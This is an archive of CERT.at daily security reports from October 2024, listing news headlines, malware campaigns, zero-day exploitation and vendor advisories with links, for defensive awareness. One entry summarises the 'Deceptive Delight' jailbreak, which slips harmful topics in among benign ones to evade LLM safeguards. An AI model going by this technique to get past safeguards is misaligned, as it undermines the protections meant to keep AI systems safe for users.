https://www.cisa.gov/news-events/ics-advisories/icsa-24-298-02 ∗∗∗ VIMESA VHF/FM Transmitter Blue Plus ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-298-01 ∗∗∗ Deep Sea Electronics DSE855 ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-298-03 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 23.10.2024
by Daily end-of-shift report 23 Oct '24

23 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Dienstag 22-10-2024 18:00 − Mittwoch 23-10-2024 18:00 Handler: Thomas Pribitzer Co-Handler: Alexander Riepl ===================== = News = ===================== ∗∗∗ Exploit released for new Windows Server "WinReg" NTLM Relay attack ∗∗∗ --------------------------------------------- Proof-of-concept exploit code is now public for a vulnerability in Microsofts Remote Registry client that could be used to take control of a Windows domain by downgrading the security of the authentication process. --------------------------------------------- https://www.bleepingcomputer.com/news/security/exploit-released-for-new-win… ∗∗∗ Hackers exploit 52 zero-days on the first day of Pwn2Own Ireland ∗∗∗ --------------------------------------------- On the first day of Pwn2Own Ireland, participants demonstrated 52 zero-day vulnerabilities across a range of devices, earning a total of $486,250 in cash prizes. --------------------------------------------- https://www.bleepingcomputer.com/news/security/hackers-exploit-52-zero-days… ∗∗∗ Fortinet warns of new critical FortiManager flaw used in zero-day attacks ∗∗∗ --------------------------------------------- Fortinet publicly disclosed today a critical FortiManager API vulnerability, tracked as CVE-2024-47575, that was exploited in zero-day attacks to steal sensitive files containing configurations, IP addresses, and credentials for managed devices. --------------------------------------------- https://www.bleepingcomputer.com/news/security/fortinet-warns-of-new-critic… ∗∗∗ Android und iOS: Fest codierte Cloud-Zugangsdaten in populären Apps entdeckt ∗∗∗ --------------------------------------------- Betroffen sind mehrere Apps mit teils Millionen von Downloads. Den Entdeckern zufolge gefährdet dies nicht nur Backend-Dienste, sondern auch Nutzerdaten. --------------------------------------------- https://www.golem.de/news/android-und-ios-fest-codierte-cloud-zugangsdaten-… ∗∗∗ Grandoreiro, the global trojan with grandiose ambitions ∗∗∗ --------------------------------------------- In this report, Kaspersky experts analyze recent Grandoreiro campaigns, new targets, tricks, and banking trojan versions. --------------------------------------------- https://securelist.com/grandoreiro-banking-trojan/114257/ ∗∗∗ The Crypto Game of Lazarus APT: Investors vs. Zero-days ∗∗∗ --------------------------------------------- Kaspersky GReAT experts break down the new campaign of Lazarus APT which uses social engineering and exploits a zero-day vulnerability in Google Chrome for financial gain. --------------------------------------------- https://securelist.com/lazarus-apt-steals-crypto-with-a-tank-game/114282/ ∗∗∗ CISA Warns of Active Exploitation of Microsoft SharePoint Vulnerability (CVE-2024-38094) ∗∗∗ --------------------------------------------- A high-severity flaw impacting Microsoft SharePoint has been added to the Known Exploited Vulnerabilities (KEV) catalog by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday, citing evidence of active .. --------------------------------------------- https://thehackernews.com/2024/10/cisa-warns-of-active-exploitation-of.html ∗∗∗ Achtung Fake-Shop: sparhimmel24.de ∗∗∗ --------------------------------------------- sparhimmel24.de ist ein betrügerischer Online-Shop, der Sie mit vermeintlichen Schnäppchen in die Falle lockt. Bestellungen werden trotz Bezahlung nicht geliefert. Wir zeigen Ihnen wie Sie Fake-Shops erkennen und sich vor Betrug schützen können. --------------------------------------------- https://www.watchlist-internet.at/news/achtung-fake-shop-sparhimmel24de ∗∗∗ Deceptive Delight: Jailbreak LLMs Through Camouflage and Distraction ∗∗∗ --------------------------------------------- We examine an LLM jailbreaking technique called "Deceptive Delight," a technique that mixes harmful topics with benign ones to trick AIs, with a high success rate.The post Deceptive Delight: Jailbreak LLMs Through Camouflage and Distraction appeared first on Unit 42. --------------------------------------------- https://unit42.paloaltonetworks.com/jailbreak-llms-through-camouflage-distr… ∗∗∗ Burning Zero Days: FortiJump FortiManager vulnerability used by nation state in espionage via MSPs ∗∗∗ --------------------------------------------- Did you know there’s widespread exploitation of FortiNet products going on using a zero day, and that there’s no CVE? Now you do. --------------------------------------------- https://doublepulsar.com/burning-zero-days-fortijump-fortimanager-vulnerabi… ∗∗∗ Threat Spotlight: WarmCookie/BadSpace ∗∗∗ --------------------------------------------- WarmCookie is a malware family that emerged in April 2024 and has been distributed via regularly conducted malspam and malvertising campaigns. --------------------------------------------- https://blog.talosintelligence.com/warmcookie-analysis/ ∗∗∗ Sicherheitslücke in Samsung-Android-Treiber wird angegriffen ∗∗∗ --------------------------------------------- Treiber für Samsungs Mobilprozessoren ermöglichen Angreifern das Ausweiten ihrer Rechte. Google warnt vor laufenden Angriffen darauf. --------------------------------------------- https://heise.de/-9991521 ∗∗∗ Public Report: WhatsApp Contacts Security Assessment ∗∗∗ --------------------------------------------- In May 2024, Meta engaged NCC Group’s Cryptography Services practice to perform a cryptography security assessment of selected aspects of the WhatsApp Identity Proof Linked Storage (IPLS) protocol implementation. IPLS underpins the WhatsApp Contacts solution, which aims to store .. --------------------------------------------- https://www.nccgroup.com/us/research-blog/public-report-whatsapp-contacts-s… ===================== = Vulnerabilities = ===================== ∗∗∗ SSA-333468: Multiple Vulnerabilities in InterMesh Subscriber Devices ∗∗∗ --------------------------------------------- InterMesh Subscriber devices contain multiple vulnerabilities that could allow an unauthenticated remote attacker to execute arbitrary code with root privileges. CVSS v4.0 Base Score: 10.0, CVE-2024-47901 --------------------------------------------- https://cert-portal.siemens.com/productcert/html/ssa-333468.html?ste_sid=23… ∗∗∗ Security updates for Wednesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (dmitry, libheif, and python-sql), Fedora (suricata and wireshark), SUSE (cargo-c, libeverest, protobuf, and qemu), and Ubuntu (golang-1.22, libheif, unbound, and webkit2gtk). --------------------------------------------- https://lwn.net/Articles/995293/ ∗∗∗ 2024-10-21: Cyber Security Advisory - ABB Relion 611, 615, 620, 630 series, REX610, REX640, SMU615, SSC600, Arctic solution, COM600, SPA ZC-400, SUE3000 Guidelines to Prevent Unauthorized Modifications of Firmware and Configuration ∗∗∗ --------------------------------------------- https://search.abb.com/library/Download.aspx?DocumentID=2NGA001911&Language… ∗∗∗ Authenticated Remote Code Execution in multiple Xerox printers ∗∗∗ --------------------------------------------- https://sec-consult.com/vulnerability-lab/advisory/authenticated-remote-cod… -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 22.10.2024
by Daily end-of-shift report 22 Oct '24

22 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Montag 21-10-2024 18:00 − Dienstag 22-10-2024 18:00 Handler: Thomas Pribitzer Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ FortiManager: Update dichtet offenbar attackiertes Sicherheitsleck ab ∗∗∗ --------------------------------------------- Ohne öffentliche Informationen hat Fortinet Updates für FortiManager veröffentlicht. Sie schließen offenbar attackierte Sicherheitslücken. --------------------------------------------- https://heise.de/-9990393 ∗∗∗ Auch ein .rdp File kann gefährlich sein ∗∗∗ --------------------------------------------- Heute wurde in ganz Europa eine Spear-Phishing Kampagne beobachtet, bei der es darum geht, dass der Empfänger ein angehängtes RDP File öffnen soll. --------------------------------------------- https://www.cert.at/de/aktuelles/2024/10/auch-rdp-file-kann-gefahrlich-sein ∗∗∗ Security Flaw in Styras OPA Exposes NTLM Hashes to Remote Attackers ∗∗∗ --------------------------------------------- Details have emerged about a now-patched security flaw in Styras Open Policy Agent (OPA) that, if successfully exploited, could have led to leakage of New Technology LAN Manager (NTLM) hashes. --------------------------------------------- https://thehackernews.com/2024/10/security-flaw-in-styras-opa-exposes.html ∗∗∗ Pixel perfect Ghostpulse malware loader hides inside PNG image files ∗∗∗ --------------------------------------------- The Ghostpulse malware strain now retrieves its main payload via a PNG image file's pixels. This development, security experts say, is "one of the most significant changes" made by the crooks behind it since launching in 2023. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2024/10/22/ghostpulse_m… ∗∗∗ OpenSSL 3.4.0 released ∗∗∗ --------------------------------------------- Version 3.4.0 of the OpenSSL SSL/TLS library has been released. It adds anumber of new encryption algorithms, support for "directly fetchedcomposite signature algorithms such as RSA-SHA2-256", and more. See therelease notes for details. --------------------------------------------- https://lwn.net/Articles/995098/ ∗∗∗ Akira ransomware continues to evolve ∗∗∗ --------------------------------------------- As the Akira ransomware group continues to evolve its operations, Talos has the latest research on the groups attack chain, targeted verticals, and potential future TTPs. --------------------------------------------- https://blog.talosintelligence.com/akira-ransomware-continues-to-evolve/ ∗∗∗ Threat actor abuses Gophish to deliver new PowerRAT and DCRAT ∗∗∗ --------------------------------------------- Cisco Talos recently discovered a phishing campaign using an open-source phishing toolkit called Gophish by an unknown threat actor. [..] Talos discovered an undocumented PowerShell RAT we’re calling PowerRAT, as one of the payloads and another infamous Remote Access Tool (RAT) DCRAT. --------------------------------------------- https://blog.talosintelligence.com/gophish-powerrat-dcrat/ ∗∗∗ Using gRPC and HTTP/2 for Cryptominer Deployment: An Unconventional Approach ∗∗∗ --------------------------------------------- In this blog entry, we discuss how malicious actors are exploiting Docker remote API servers via gRPC/h2c to deploy the cryptominer SRBMiner to facilitate their mining of XRP on Docker hosts. --------------------------------------------- https://www.trendmicro.com/en_us/research/24/j/using-grpc-http-2-for-crypto… ∗∗∗ Web Application Security for DevOps: Site and Origin Dynamics and Cross-Site Request Forgery ∗∗∗ --------------------------------------------- This is a continuation of the series on web application security where we dive into cookie dynamics. --------------------------------------------- https://www.bitsight.com/blog/web-application-security-devops-site-and-orig… ===================== = Vulnerabilities = ===================== ∗∗∗ VMware fixes bad patch for critical vCenter Server RCE flaw ∗∗∗ --------------------------------------------- VMware has released another security update for CVE-2024-38812, a critical VMware vCenter Server remote code execution vulnerability that was not correctly fixed in the first patch from September 2024. --------------------------------------------- https://www.bleepingcomputer.com/news/security/vmware-fixes-bad-patch-for-c… ∗∗∗ Zyxel security advisory for insufficiently protected credentials vulnerability in firewalls ∗∗∗ --------------------------------------------- The insufficiently protected credentials vulnerability in the CLI command of the USG FLEX H series firewalls could allow an authenticated local attacker to gain privilege escalation by stealing the authentication token of a login administrator. Note that this attack could be successful only if the administrator has not logged out. --------------------------------------------- https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-… ∗∗∗ Security updates for Tuesday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (ffmpeg, ghostscript, libsepol, openjdk-11, openjdk-17, perl, and python-sql), Oracle (389-ds-base, buildah, containernetworking-plugins, edk2, httpd, java-1.8.0-openjdk, java-11-openjdk, java-17-openjdk, java-21-openjdk, kernel, python-setuptools, skopeo, and webkit2gtk3), Red Hat (buildah), Slackware (openssl), SUSE (apache2, firefox, libopenssl-3-devel, podman, and python310-starlette), and Ubuntu (cups-browsed, firefox, libgsf, and linux-gke). --------------------------------------------- https://lwn.net/Articles/995095/ ∗∗∗ Dell Product Security Update Advisory (CVE-2024-45766) ∗∗∗ --------------------------------------------- https://asec.ahnlab.com/en/83995/ ∗∗∗ SolarWinds Product Security Update Advisory (CVE-2024-45711) ∗∗∗ --------------------------------------------- https://asec.ahnlab.com/en/84002/ ∗∗∗ ICONICS and Mitsubishi Electric Products ∗∗∗ --------------------------------------------- https://www.cisa.gov/news-events/ics-advisories/icsa-24-296-01 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 21.10.2024
by Daily end-of-shift report 21 Oct '24

21 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Freitag 18-10-2024 18:00 − Montag 21-10-2024 18:00 Handler: Alexander Riepl Co-Handler: Michael Schlagenhaufer ===================== = News = ===================== ∗∗∗ New macOS vulnerability, “HM Surf”, could lead to unauthorized data access ∗∗∗ --------------------------------------------- Microsoft Threat Intelligence uncovered a macOS vulnerability that could potentially allow an attacker to bypass the operating system’s Transparency, Consent, and Control (TCC) technology and gain unauthorized access to a user’s protected data. The vulnerability, which we refer to as “HM Surf”, involves removing the TCC protection for the Safari browser directory and modifying a configuration file in the said directory to gain access to the user’s data, including browsed pages, the device’s camera, microphone, and location, without the user’s consent. [..] Apple released a fix for this vulnerability, now identified as CVE-2024-44133, as part of security updates for macOS Sequoia, released on September 16, 2024. At present, only Safari uses the new protections afforded by TCC. --------------------------------------------- https://www.microsoft.com/en-us/security/blog/2024/10/17/new-macos-vulnerab… ∗∗∗ Hooked by the Call: A Deep Dive into The Tricks Used in Callback Phishing Emails ∗∗∗ --------------------------------------------- Previously, Trustwave SpiderLabs covered a massive fake order spam scheme that impersonated a tech support company and propagated via Google Groups. Since then, we have observed more spam campaigns using this hybrid form of cyberattack with varying tactics, techniques, and procedures (TTP). [..] In this blog, we will showcase the different spam techniques used in these phishing emails. --------------------------------------------- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hooked-by-t… ∗∗∗ Hackers Exploit Roundcube Webmail XSS Vulnerability to Steal Login Credentials ∗∗∗ --------------------------------------------- Unknown threat actors have been observed attempting to exploit a now-patched security flaw in the open-source Roundcube webmail software as part of a phishing attack designed to steal user credentials. [..] The attack chain, per Positive Technologies, is an attempt to exploit CVE-2024-37383 (CVSS score: 6.1), a stored cross-site scripting (XSS) vulnerability via SVG animate attributes that allows for execution of arbitrary JavaScript in the context of the victim's web browser. --------------------------------------------- https://thehackernews.com/2024/10/hackers-exploit-roundcube-webmail-xss.html ∗∗∗ Severe flaws in E2EE cloud storage platforms used by millions ∗∗∗ --------------------------------------------- Several end-to-end encrypted (E2EE) cloud storage platforms are vulnerable to a set of security issues that could expose user data to malicious actors. [..] The researchers notified Sync, pCloud, Seafile, and Icedrive of their findings on April 23, 2024, and contacted Tresorit on September 27, 2024, to discuss potential improvements in their particular cryptographic designs. [..] BleepingComputer contacted all five cloud service providers for a comment on Hofmann's and Truong's research, and we received the below statements. --------------------------------------------- https://www.bleepingcomputer.com/news/security/severe-flaws-in-e2ee-cloud-s… ∗∗∗ Open source LLM tool primed to sniff out Python zero-days ∗∗∗ --------------------------------------------- The static analyzer uses Claude AI to identify vulns and suggest exploit code Researchers with Seattle-based Protect AI plan to release a free, open source tool that can find zero-day vulnerabilities in Python codebases with the help of Anthropics Claude AI model. --------------------------------------------- https://go.theregister.com/feed/www.theregister.com/2024/10/20/python_zero_… ∗∗∗ Hunting for Remote Management Tools: Detecting RMMs ∗∗∗ --------------------------------------------- Given the wide range of different RMM tools available, performing a threat hunt to identify all different available tools used in the organization brings a couple of challenges. In this blog, we’ll dive a little deeper into how we tackled this challenge and share this knowledge so you can use it to keep your organization safe. --------------------------------------------- https://blog.nviso.eu/2024/10/21/hunting-for-remote-management-tools-detect… ∗∗∗ Cisco bestätigt Attacke auf DevHub-Portal und nimmt es offline ∗∗∗ --------------------------------------------- Cisco hat aktuell laufende Untersuchungen zu einem IT-Sicherheitsvorfall vorangetrieben und nun eine Attacke bestätigt. Dabei sollen Angreifer Zugriff auf nicht für die Öffentlichkeit bestimmte Daten gehabt haben. --------------------------------------------- https://heise.de/-9987412 ===================== = Vulnerabilities = ===================== ∗∗∗ Security updates for Monday ∗∗∗ --------------------------------------------- Security updates have been issued by Debian (asterisk, chromium, php-horde-mime-viewer, and php-horde-turba), Fedora (apache-commons-io, buildah, chromium, containers-common, libarchive, libdigidocpp, oath-toolkit, podman, rust-hyper-rustls, rust-reqwest, rust-rustls-native-certs, rust-rustls-native-certs0.7, rust-tonic, rust-tonic-build, rust-tonic-types, rust-tower, rust-tower-http, rust-tower-http0.5, rust-tower0.4, thunderbird, and unbound), SUSE (buildah, chromedriver, chromium, element-desktop, element-web, jetty-annotations, nodejs-electron, php7, php74, php8, podman, python3-virtualbox, qemu, thunderbird, and valkey), and Ubuntu (amd64-microcode). --------------------------------------------- https://lwn.net/Articles/994941/ ∗∗∗ Angreifer können PCs mit Virenschutz von Bitdefender und Trend Micro attackieren ∗∗∗ --------------------------------------------- Sicherheitslücken in Virenschutz-Software von Bitdefender und Trend Micro gefährden Systeme. Admins sollten die verfügbaren Sicherheitsupdates zeitnah installieren, um Attacken vorzubeugen. [..] Im Supportbereich der Bitdefender-Website geben die Entwickler an, in diesem Kontext insgesamt fünf Sicherheitslücken (CVE-2023-49567, CVE-2023-49570, CVE-2023-6055, CVE-2023-6056, CVE-2023-6057) mit dem Bedrohungsgrad "hoch" geschlossen zu haben. Damit so eine Attacke klappt, können Angreifer etwa über Hashkollsionen (MD5 und SHA1) Zertifikate erzeugen, die als legitim durchgewunken werden. Die Sicherheitsprobleme sollen in der sich automatisch installierenden Total-Security-Version 27.0.25.11 gelöst sein. --------------------------------------------- https://heise.de/-9987394 -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

Tageszusammenfassung - 18.10.2024
by Daily end-of-shift report 18 Oct '24

18 Oct '24

===================== = End-of-Day report = ===================== Timeframe: Donnerstag 17-10-2024 18:00 − Freitag 18-10-2024 18:00 Handler: Alexander Riepl Co-Handler: n/a ===================== = News = ===================== ∗∗∗ Analysis of the Crypt Ghouls group: continuing the investigation into a series of attacks on Russia ∗∗∗ --------------------------------------------- A close look at the utilities, techniques, and infrastructure used by the hacktivist group Crypt Ghouls has revealed links to groups such as Twelve, BlackJack, etc. --------------------------------------------- https://securelist.com/crypt-ghouls-hacktivists-tools-overlap-analysis/1142… ∗∗∗ Feline Hackers Among Us? (A Deep Dive and Simulation of the Meow Attack) ∗∗∗ --------------------------------------------- Introduction In the perpetually evolving field of cybersecurity, new threats materialize daily. Attackers are on the prowl for weaknesses in infrastructure and software like a cat eyeing its helpless prey. --------------------------------------------- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/feline-hack… ∗∗∗ U.S. and Allies Warn of Iranian Cyberattacks on Critical Infrastructure in Year-Long Campaign ∗∗∗ --------------------------------------------- Cybersecurity and intelligence agencies from Australia, Canada, and the U.S. have warned about a year-long campaign undertaken by Iranian cyber actors to infiltrate critical infrastructure organizations via brute-force attacks."Since October 2023, Iranian ..d --------------------------------------------- https://thehackernews.com/2024/10/us-and-allies-warn-of-iranian.html ∗∗∗ Intel hits back at Chinas accusations it bakes in NSA backdoors ∗∗∗ --------------------------------------------- Chipzilla says it obeys the law wherever it is, which is nice Intel has responded to Chinese claims that its chips include security backdoors at the direction of Americas NSA. --------------------------------------------- https://www.theregister.com/2024/10/18/intel_china_security_allegations/ ∗∗∗ Alleged Bitcoin crook faces 5 years after SECs X account pwned ∗∗∗ --------------------------------------------- SIM swappers strike again, warping cryptocurrency prices An Alabama man faces five years in prison for allegedly attempting to manipulate the price of Bitcoin by pwning the US Securities and Exchange Commissions X account earlier this year. --------------------------------------------- https://www.theregister.com/2024/10/18/sec_bitcoin_arrest/ ∗∗∗ Brazil Arrests ‘USDoD,’ Hacker in FBI Infragard Breach ∗∗∗ --------------------------------------------- Brazilian authorities reportedly have arrested a 33-year-old man on suspicion of being "USDoD," a prolific cybercriminal who rose to infamy in 2022 after infiltrating the FBIs InfraGard program and leaking contact information for 80,000 members. More recently, USDoD was behind a breach at the consumer data broker National Public Data that led .. --------------------------------------------- https://krebsonsecurity.com/2024/10/brazil-arrests-usdod-hacker-in-fbi-infr… ∗∗∗ EIW — ESET Israel Wiper — used in active attacks targeting Israeli orgs ∗∗∗ --------------------------------------------- One of my Mastodon followers sent me an interesting toot today, which lead to this forum post .. --------------------------------------------- https://doublepulsar.com/eiw-eset-israel-wiper-used-in-active-attacks-targe… ∗∗∗ What I’ve learned in my first 7-ish years in cybersecurity ∗∗∗ --------------------------------------------- Plus, a zero-day vulnerability in Qualcomm chips, exposed health care devices, and the latest on the Salt Typhoon threat actor. --------------------------------------------- https://blog.talosintelligence.com/threat-source-newsletter-oct-17-2024/ ∗∗∗ Call stack spoofing explained using APT41 malware ∗∗∗ --------------------------------------------- Summary Call stack spoofing isn’t a new technique, but it has become more popular in the last few years. Call stacks are a telemetry source for EDR software that can be used to determine if a process made suspicious actions (requesting a handle to the lsass process, writing suspicious code to a newly allocated area, .. --------------------------------------------- https://cybergeeks.tech/call-stack-spoofing-explained-using-apt41-malware/ ∗∗∗ Fake North Korean IT Workers Infiltrate Western Firms, Demand Ransom ∗∗∗ --------------------------------------------- North Korean hackers are infiltrating Western companies using fraudulent IT workers to steal sensitive data and extort ransom. --------------------------------------------- https://hackread.com/fake-north-korean-it-workers-west-firms-demand-ransom/ ∗∗∗ U.S. and UK Warn of Russian Cyber Threats: 9 of 12 GreyNoise-Tracked Vulnerabilities in the Advisory Are Being Probed Right Now ∗∗∗ --------------------------------------------- Joint U.S. and UK advisory identifies 24 vulnerabilities exploited by Russian state-sponsored APT 29, with GreyNoise detecting active probing on nine of these critical CVEs. Stay informed with real-time .. --------------------------------------------- https://www.greynoise.io/blog/u-s-and-uk-warn-of-russian-cyber-threats-9-of… ∗∗∗ Apple Passwörter: So lautet das Rezept für generierte Passwörter ∗∗∗ --------------------------------------------- Ein leitender Softwareentwickler Apples erklärt in einem Blogpost, nach welchem Muster Apple Passwörter generiert. --------------------------------------------- https://heise.de/-9986503 ===================== = Vulnerabilities = ===================== ∗∗∗ SVD-2024-1013: Third-Party Package Updates in Splunk Add-on for Office 365 - October 2024 ∗∗∗ --------------------------------------------- Splunk remedied common vulnerabilities and exposures (CVEs) in Third Party Packages in Splunk Add-on for Office 365 versions 4.5.2 and higher. --------------------------------------------- https://advisory.splunk.com//advisories/SVD-2024-1013 ∗∗∗ Synology-SA-24:17 Synology Camera ∗∗∗ --------------------------------------------- The vulnerabilities allow remote attackers to execute arbitrary code, remote attackers to bypass security constraints and remote attackers to conduct denial-of-service attacks via a susceptible version of Synology Camera BC500 Firmware, Synology Camera TC500 Firmware and Synology Camera CC400W Firmware. --------------------------------------------- https://www.synology.com/en-global/support/security/Synology_SA_24_17 ∗∗∗ ZDI-24-1419: Trend Micro Deep Security Improper Access Control Local Privilege Escalation Vulnerability ∗∗∗ --------------------------------------------- http://www.zerodayinitiative.com/advisories/ZDI-24-1419/ -- CERT.at Daily mailing list Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily

1 0

2025

2024

2023

2022

2021

2020

2019

2018

2017

2016

2015

2014

2013

2012

Daily